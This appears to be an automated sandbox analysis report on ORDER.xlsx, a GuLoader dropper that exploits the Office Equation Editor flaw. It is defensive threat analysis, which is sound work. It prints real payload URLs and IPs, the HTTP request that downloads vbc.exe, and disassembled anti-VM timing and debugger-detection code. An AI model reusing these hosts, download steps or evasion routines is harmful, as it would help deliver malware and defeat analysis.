Windows Analysis Report ORDER.xlsx

Overview

General Information

Sample Name: ORDER.xlsx
Analysis ID: 482999
MD5: c82cca02226f7910cd552124c3cf6e7f
SHA1: 79214e25d81860d25a8e88df99d487394c029da1
SHA256: 5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
Tags: GuLoader, VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}
Multi AV Scanner detection for submitted file
Source: ORDER.xlsx Virustotal: Detection: 28%
Source: ORDER.xlsx ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 67MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 10:13:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 22:47:50 GMTETag: "21000-5cbe84130fcf7"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /reverse/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ED60BCE4.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003669E3 NtAllocateVirtualMemory, 6_2_003669E3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00366A43 NtAllocateVirtualMemory, 6_2_00366A43
Source: C:\Users\Public\vbc.exe Code function: 6_2_00366B38 NtAllocateVirtualMemory, 6_2_00366B38
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: ORDER.xlsx Virustotal: Detection: 28%
Source: ORDER.xlsx ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$ORDER.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREDE6.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419564 push esi; retn 000Ch 6_2_004196B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407A1A push edi; ret 6_2_00407BB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405CE3 pushad ; ret 6_2_00405CE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004060E5 push ds; ret 6_2_004060E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408903 push edi; retf 6_2_00408906
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407B8C push edi; ret 6_2_00407BB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036001A pushad ; retf 6_2_0036001C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036007A pushad ; retf 6_2_0036007C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00360E7A push 81D7EEE9h; ret 6_2_00360E80
Source: C:\Users\Public\vbc.exe Code function: 6_2_00362268 push ds; retf 6_2_00362276
Source: C:\Users\Public\vbc.exe Code function: 6_2_00361B92 push esp; retf 6_2_00361B95
Source: C:\Users\Public\vbc.exe Code function: 6_2_003603FD pushad ; retf 6_2_003603FE
Source: initial sample Static PE information: section name: .text entropy: 7.10018192133

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000369799 second address: 0000000000369799 instructions:
    0x00000000 rdtsc
    0x00000002 mov eax, 29D86A1Dh
    0x00000007 sub eax, 1A2EF41Ch
    0x0000000c xor eax, 7F8AA893h
    0x00000011 xor eax, 7023DE93h
    0x00000016 cpuid
    0x00000018 popad
    0x00000019 call 00007FF3F0AF7358h
    0x0000001e lfence
    0x00000021 mov edx, 100ABEA1h
    0x00000026 xor edx, 6F0D7B68h
    0x0000002c xor edx, 62879C8Ah
    0x00000032 xor edx, 627E5957h
    0x00000038 mov edx, dword ptr [edx]
    0x0000003a lfence
    0x0000003d jmp 00007FF3F0AF739Ah
    0x0000003f test ax, cx
    0x00000042 cmp ecx, edx
    0x00000044 test ebx, eax
    0x00000046 cmp edx, 8B44DCE9h
    0x0000004c ret
    0x0000004d sub edx, esi
    0x0000004f ret
    0x00000050 add edi, edx
    0x00000052 dec dword ptr [ebp+000000F8h]
    0x00000058 cmp dword ptr [ebp+000000F8h], 00000000h
    0x0000005f jne 00007FF3F0AF72E8h
    0x00000061 jmp 00007FF3F0AF739Eh
    0x00000063 test edx, 67D05910h
    0x00000069 call 00007FF3F0AF73A3h
    0x0000006e call 00007FF3F0AF7379h
    0x00000073 lfence
    0x00000076 mov edx, 100ABEA1h
    0x0000007b xor edx, 6F0D7B68h
    0x00000081 xor edx, 62879C8Ah
    0x00000087 xor edx, 627E5957h
    0x0000008d mov edx, dword ptr [edx]
    0x0000008f lfence
    0x00000092 jmp 00007FF3F0AF739Ah
    0x00000094 test ax, cx
    0x00000097 cmp ecx, edx
    0x00000099 test ebx, eax
    0x0000009b cmp edx, 8B44DCE9h
    0x000000a1 ret
    0x000000a2 mov esi, edx
    0x000000a4 pushad
    0x000000a5 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852 Thread sleep time: -240000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369889 rdtsc 6_2_00369889

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369889 rdtsc 6_2_00369889
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003664E7 mov eax, dword ptr fs:[00000030h] 6_2_003664E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003636BB mov eax, dword ptr fs:[00000030h] 6_2_003636BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036929E mov eax, dword ptr fs:[00000030h] 6_2_0036929E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364336 mov eax, dword ptr fs:[00000030h] 6_2_00364336
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A32B mov eax, dword ptr fs:[00000030h] 6_2_0036A32B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00368B74 mov eax, dword ptr fs:[00000030h] 6_2_00368B74
Source: C:\Users\Public\vbc.exe Code function: 6_2_003643BB mov eax, dword ptr fs:[00000030h] 6_2_003643BB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: Program Manager<